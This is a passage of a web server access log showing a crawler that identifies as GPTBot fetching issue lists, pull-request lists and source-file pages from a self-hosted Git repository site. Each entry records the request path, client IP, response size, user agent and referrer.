"/windpacer/dbserver/pulls?assignee=1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10049] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&project=-1&state=closed&type=all" -[17/Feb/2026:19:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:19:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:24:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:19:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:24:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" -[17/Feb/2026:19:24:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33615] [Gzip 10.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" -[17/Feb/2026:19:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:24:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:19:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11281] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 12135] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:19:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" -[17/Feb/2026:19:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11214] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:19:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12022] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12021] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:19:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:19:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:19:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:19:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:19:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v4.7.py" -[17/Feb/2026:19:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.0.py" -[17/Feb/2026:19:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:19:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:19:24:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:19:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10141] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=all&type=all" -[17/Feb/2026:19:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=open&type=all" -[17/Feb/2026:19:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13583] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" -[17/Feb/2026:19:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11827] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:19:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=closed&type=all" -[17/Feb/2026:19:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" -[17/Feb/2026:19:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:19:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10059] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:19:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 